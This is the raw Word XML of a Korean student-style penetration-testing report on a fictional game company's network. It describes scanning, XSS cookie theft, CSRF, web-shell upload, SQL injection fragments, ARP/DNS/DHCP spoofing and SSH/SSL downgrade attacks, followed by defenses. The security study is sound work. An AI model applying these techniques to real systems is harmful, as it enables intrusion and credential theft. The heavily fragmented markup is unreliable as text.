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제목</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>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이름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89125C">
      <w:r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 차</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1DA7" w:rsidRPr="001E2DD9" w:rsidRDefault="001E2DD9" w:rsidP="001E2DD9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1E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>서론</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089125C" w:rsidRPr="00664540" w:rsidRDefault="0089125C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컨설팅 의뢰 가상 회사</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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회사 소개</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>--------------------------------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:t>-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00863AB2" w:rsidRDefault="004F56F1" w:rsidP="009E6C11">
      <w:pPr>
        <w:pStyle w:val="af0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조직도 및 네트워크 구성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조직도 </w:t>
      </w:r>
      <w:r>
        <w:t>---------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:t>--------</w:t>
      </w:r>
      <w:r>
        <w:t>-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  <w:r w:rsidR="00632150">
        <w:t>-------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRP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의뢰 요청 시나리오 및 요구 사항</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t xml:space="preserve"> -----------</w:t>
      </w:r>
      <w:r w:rsidR="00863AB2">
        <w:t>------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00664540" w:rsidRDefault="009E6C11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모의 해킹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89125C" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">해킹 </w:t>
      </w:r>
      <w:r w:rsidR="0089125C" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PC </w:t>
      </w:r>
      <w:r w:rsidR="0089125C" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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보안점검 체크리스트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  <w:r w:rsidR="00863AB2">
        <w:t>-----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863AB2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63AB2" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>일정</w:t>
      </w:r>
      <w:r w:rsidR="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00863AB2">
        <w:t>---------------------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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E970E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00E970E7">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">C </w:t>
      </w:r>
      <w:r w:rsidR="00E970E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>현황 점검</w:t>
      </w:r>
      <w:r w:rsidR="00E970E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>------------------------------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:t>----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00632150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632150" w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>모의해킹 실시</w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:t>--------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:t>-------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089125C" w:rsidRPr="00664540" w:rsidRDefault="0089125C" w:rsidP="009E6C11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설정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863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>새로 구성된 토폴로지</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>----------------------------</w:t>
      </w:r>
      <w:r w:rsidR="004F56F1">
        <w:t>-------------------------------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706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>발견된 취약점에 대한 방어</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>----------------------</w:t>
      </w:r>
      <w:r w:rsidR="004F56F1">
        <w:t>-----------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E08A0" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82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결론</w:t>
      </w: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서론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 규모의 크고 작음을 떠나서 게임 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proofErr w:type="spellStart"/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proofErr w:type="spellEnd"/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 컨설팅 의뢰 가상 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 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의뢰 회사의 그룹사인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17685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6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7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8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9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proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로스트아크</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">마치고 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C90AE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>오픈베타</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C90AE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 테스트 준비에 몰입한 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회사 전체가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로스트아크</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">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 서비스를 본사와 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 사명으로 회사를 설립</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E08A0" w:rsidRDefault="002E08A0">
      <w:r>
        <w:br w:type="page"/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조직도 및 네트워크 구성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00664540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 xml:space="preserve">조직도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Pr="00C90311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C90311">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22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 xml:space="preserve">는 총 </w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개 운영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 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 xml:space="preserve">망을 연결하는 경계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 xml:space="preserve">내부 직원 네트워크 대상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 관리부 및 서버실 네트워크 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 xml:space="preserve">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 xml:space="preserve">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기타 내부에서는 별다른 네트워크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 이루어지고 있지 않음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의뢰 요청 시나리오 및 요구 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웹 서버 및 게임 서버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기타 서비스 중인 서버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네트워크에 대한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>회사에서 사용중인 네트워크를 구성하고 있는 장비들에 대한 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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">점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2E08A0" w:rsidRDefault="002E08A0">
      <w:r>
        <w:br w:type="page"/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 해킹</w:t>
      </w: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6C11" w:rsidRPr="00664540">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PC </w:t>
      </w:r>
      <w:r w:rsidR="004A6F7D" w:rsidRPr="00664540">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>현황</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11" w:rsidRPr="00664540">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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 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 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 정책(암호 복잡성, 최근 암호 기억, 최대 암호 사용기간, 최소 암호 길이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 잠금 정책(계정 잠금 기간, 계정 잠금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,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 초기화 시간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 사용자 권한 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 접속용 계정 구분 여부 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 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 액세스 감사, 계정 로그온 이벤트 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 일정 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서버 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">SSL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>설정 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보안점검 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 OS 서버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 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업로드 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인증 우회, Blind Injection, Mass Injection, 저장 프로시저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 서버, DB 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 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 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각 부서 및 서버 네트워크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H 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서버(DNS서버, DHCP서버, 웹 서버, DB 서버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L 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SNMP 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863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">C </w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>현황 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 정책 및 계정 잠금 정책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CentOS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pam.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system-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auth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>,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default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userad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 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1135380"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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905000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CentOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 일정 설정 및 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웹 서버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Default="00632150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 w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 모의해킹 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 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 중 가장 기본적인 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 xml:space="preserve">프로토콜을 사용하고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 xml:space="preserve">을 보내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  <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>하는 공격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 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접근 가능한 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>대역대에서</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 동작중인 시스템의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 확인 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100.0/24 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS[Secondary], DHCP[Secondary], VPN, CA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 xml:space="preserve">대역대의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 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원하는 대상의 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확인할 수 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>있는 공격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통해 </w:t>
      </w:r>
      <w:r w:rsidR="00032B7D" w:rsidRPr="00032B7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>어떠한 서비스를 수행 중인지 확인 가능하고 확인한 서비스를 이용해 공격을 시도할 수 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 xml:space="preserve">웹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 xml:space="preserve">를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 시도했을 때의 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>PN 서버[Window 2008 R2, 10.10.200.50]</w:t>
      </w:r>
      <w:r w:rsidRPr="0034182E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을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 xml:space="preserve">을 시도했을 때 방화벽이 있다면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 되지 않고 방화벽이 없다면 열려 있는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 확인할 수 있다는 것을 알 수 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 xml:space="preserve">이란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 xml:space="preserve">가 설치된 네트워크에 다른 원격 컴퓨터에 유저 명과 패스워드를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 xml:space="preserve">로 해서 접속할 수 있게 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>만드는 공격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 연결되면 공격자는 시스템의 유저 명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 xml:space="preserve">공유정보 등을 열람할 수 있게 되고 심지어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 xml:space="preserve">인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 일부에도 접근할 수 있게 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 xml:space="preserve">를 사용하는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 xml:space="preserve">은 연결이 되지만 연결된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 서버의 접근할 수 없음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 xml:space="preserve">아래 링크에서 확인 가능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 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 xml:space="preserve">같은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 xml:space="preserve">를 이용해 공격하고자 하는 페이지의 오브젝트 자원 및 오브젝트 구조 자원을 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>수정하는 공격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 xml:space="preserve">원격지 웹 서버에 파일을 생성하거나 삭제하는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 xml:space="preserve">와 유사한 기능을 구연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허용 안 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 xml:space="preserve">이나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 같이 서비스에 연결하여 로그온을 수행할 때 나타나는 안내문을 통해 정보를 수집하는</w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr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 xml:space="preserve">을 이용하면 공격자는 공격대상의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 xml:space="preserve">정보 및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 페이지의 종류 및 버전을 알아낼 수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현재 컨설팅 대상의 웹 페이지에 접속 후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 xml:space="preserve">을 확인하면 헤더를 통해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 버전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 정보를 확인 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proofErr w:type="spellStart"/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>ttpint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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툴을 이용하면 서버의 정보를 알아올 수 있는데 컨설팅 대상의 메인 페이지로 접속 시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 xml:space="preserve">로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 것과 서버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 정보가 노출되는 것을 볼 수 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 대상의 웹 페이지 접속 후 기본 페이지에서 가지고 있지 않을 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 불러오면 웹 페이지에 오류 메시지가 출력됨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이 오류 메시지를 확인해보면 서버와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 정보를 확인할 수 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 xml:space="preserve">하는 모든 파일을 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>보여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 목적은 문서의 공유로 파일 탐색기처럼 원하는 문서로 바로 찾아갈 수 있게 하는 용도였지만 최근에는 악의적인 목적을 갖고 있는 사람들에 의해 탈취 및 웹 서버 공격이 이루어지고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 모든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 xml:space="preserve">혹은 중요한 정보가 포함된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 xml:space="preserve">이 가능하게 설정되어 중요파일 정보가 노출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 가지는 고유한 취약점을 이용해 세션을 가로채는 공격을 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 xml:space="preserve">번호가 잘못되면 이를 바로잡기 위한 작업을 하는데 서버와 클라이언트가 통신을 할 때 각각 잘못된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 위조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 번호로 연결된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 혼란을 준 뒤 자신이 끼어들어가는 방식을 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 xml:space="preserve">간의 통신을 관찰할 수 있고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 xml:space="preserve">를 이용한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 xml:space="preserve">은 물론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 xml:space="preserve">등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 xml:space="preserve">를 이용한 거의 모든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 갈취가 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 대입 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 대입 공격은 가능한 모든 암호 조합을 무차별로 시도하는 다소 기초적인 방식의 해킹 공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 암호는 충분한 시간만 주어진다면 모두 대입이 가능하고 특정 단어나 패턴이 유추 가능할 경우엔 더욱 취약할 수 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들은 대입에 소요되는 시간을 줄이기 위해 사전에 있는 단어를 우선 시도하는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 수행하기도 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 xml:space="preserve">을 통해 특정 페이지의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 xml:space="preserve">및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 xml:space="preserve">개인 정보까지 유출될 수 있음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 xml:space="preserve">는 웹 상에서 가장 기초적인 취약점 공격 방법의 일종으로 공격자가 공격하려는 사이트에 스크립트를 넣는 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20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 성공했을 시 사이트에 접속한 사용자는 삽입된 코드를 실행하게 되어 의도치 않은 행동을 수행시키거나 쿠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 토큰 등의 민감한 정보를 탈취할 수 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 이용해 게시 글에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 쿠키 값 획득이 가능한지 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 xml:space="preserve">확인 후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 xml:space="preserve">으로 돌아와 웹 서비스를 실행 후 쿠키 값을 저장하기 위한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 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 세션을 적용 후 세션이 유지되는지 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웹 어플리케이션 취약점 중 하나로 사용자가 자신의 의지와 무관하게 공격자가 의도한 행동을 하게 만드는 공격 </w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방법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 페이지에 접속한 사용자를 공격자가 의도하는 행동을 하게 만들어 특정 페이지를 보안에 취약하게 한다거나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 등의 작업을 수행할 수 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글을 게시할 때 넘어가는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 확인하고 자동 광고가 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 글 작성 및 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업로드 된 게시 글을 확인하면 공격자가 원하는 게시 글이 자동으로 등록되는 것을 볼 수 있음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 업로드 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 업로드 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 xml:space="preserve">악성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 xml:space="preserve">을 서버에 전달하여 해당 페이지를 통해 악성 코드가 실행되도록 하는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r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 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 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 통해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 xml:space="preserve">을 탈취하거나 서버 변조 등 웹 서버를 장악할 수 있음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 해킹 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파일을 업로드하고 게시 판에서 파일을 다운 받으려 하면 다운이 되지만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 이용해 그 파일 다운 받으려 하면 실행이 되고 파일이 업로드 되는 경로를 알고 있다면 그 경로에 해당하는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 xml:space="preserve">에 접근함으로써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 xml:space="preserve">파일을 실행 가능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 데이터베이스를 구축하고 활용하기 위해 사용하는 언어로 데이터 정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 기능에 대한 명령을 포함하고 있음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 xml:space="preserve">와 연동된 웹 응용 프로그램에서 입력된 데이터의 유효성 검증을 하지 않는 보안 취약점을 이용한 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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 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 의해 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 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증 우회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데이터 접근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수정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 등의 공격을 할 수 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 해킹 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 우회 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 통해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 길이와 이름을 확인할 수 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'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'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ase table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greet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\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 문을 이용해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 이름을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 xml:space="preserve">가 가지고 있는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 길이 및 내용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 xml:space="preserve">and (select pass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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,pw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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>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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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 길이 및 내용 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 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 xml:space="preserve">통신하는 두 대상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를 공격자 자신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로 바꿔 중간에서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 xml:space="preserve">을 가로채는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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 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 xml:space="preserve">공격이 성공하게 되면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 xml:space="preserve">즉 중간자 상태가 되어 두 공격 대상이 서로 통신하는 내용을 볼 수 있고 그 정보를 다시 목적지로 보내거나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 일부 변조하여 보낼 수도 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 자신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 악용하고자 하는 대상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주소로 변조하여 공격하는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방법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 공격 대상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 서버와 신뢰관계라면 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데이터에 접근해 정보를 갈취하거나 중요 데이터들을 갈취할 수 있음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 xml:space="preserve">공격에 앞서 경영관리부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 xml:space="preserve">를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ssh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 제공하는 정보를 공격자가 변조하여 공격 대상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 xml:space="preserve">를 속이는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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 당하게 되면 공격자가 원하는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 xml:space="preserve">서버등을 변조하여 공격 대상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 xml:space="preserve">에게 보내 적용시킬 수 있음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ettercap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 xml:space="preserve">서버의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 xml:space="preserve">할당대역을 모두 할당 받아오는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C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모든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 xml:space="preserve">주소를 할당 받아오게 되면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 xml:space="preserve">들은 정상적인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 할당 받지 못해 네트워크에 참여할 수 없게 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Ettercap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 xml:space="preserve">가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 xml:space="preserve">를 할 때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 xml:space="preserve">서버보다 먼저 응답하여 공격자가 의도한 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주소</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 알려주는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방법의 공격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 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 xml:space="preserve">을 이용해 공격 대상이 특정 사이트로 접근을 시도하면 공격자가 원하는 사이트로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 수 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모의 해킹 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 xml:space="preserve">에서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227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dnsspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">메시지를 사용하여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 변경하여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 xml:space="preserve">의 흐름을 조정하는 </w:t>
      </w:r>
      <w:r w:rsidR="00C10F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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 xml:space="preserve">공격 대상에게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 xml:space="preserve">메시지를 보내 대상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 변경할 수 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 전환 요청이 꺼져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 xml:space="preserve">설정에 방향 전환 요청에 체크가 되어 있는지 확인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다시 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 돌아와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 확인해보면 변동이 없는 것을 볼 수 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 전환 요청이 켜져 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 방향 전환 요청에 체크가 되어 있는지 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 xml:space="preserve">취약점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 xml:space="preserve">버전을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 xml:space="preserve">동시 지원하는 경우 공격자는 공격 대상과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 xml:space="preserve">사이에 중간자가 되어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 xml:space="preserve">을 </w:t>
      </w:r>
      <w:r w:rsidR="00C44DD4" w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가로챔,</w:t>
      </w:r>
      <w:r w:rsidR="00C44DD4" w:rsidRPr="00C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0057576B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가로챈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 변조시켜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 xml:space="preserve">의 응답을 버전1만 지원하는 것처럼 공격 대상에게 보내 버전1로 접근하도록 하는 </w:t>
      </w:r>
      <w:r w:rsidR="00C10F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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 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1로 공격 대상이 접근을 하게 되면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 아이디와 비밀번호로 로그온 한 내용을 갈취해 정보를 얻어올 수 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 xml:space="preserve">툴과 만든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 xml:space="preserve">필터 파일을 이용해 경영기획부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 xml:space="preserve">취약점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웹 서버와 공격 대상의 중간에서 중간자 상태가 되어 공격자와 공격 대상 사이에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 xml:space="preserve">로 통신하게끔 유도하고 공격자와 웹 서버 사이에는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 xml:space="preserve">로 통신하게끔 유도하는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와 공격 대상은 서로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 통신을 하게 되므로 공격 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아이디와 패스워드를 갈취할 수 있음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로그온 시도 후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 xml:space="preserve">으로 돌아와 와이어 샤크를 확인해보면 아이디와 비밀번호가 노출된 것을 볼 수 있음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 많이 사용하고 있는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 xml:space="preserve">버전은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 xml:space="preserve">를 사용하는데 보안은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 사용하고 있음,</w:t>
      </w:r>
      <w:r>
        <w:rPr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이렇게 보안이 취약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 xml:space="preserve">을 </w:t>
      </w:r>
      <w:r w:rsidR="00C10F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
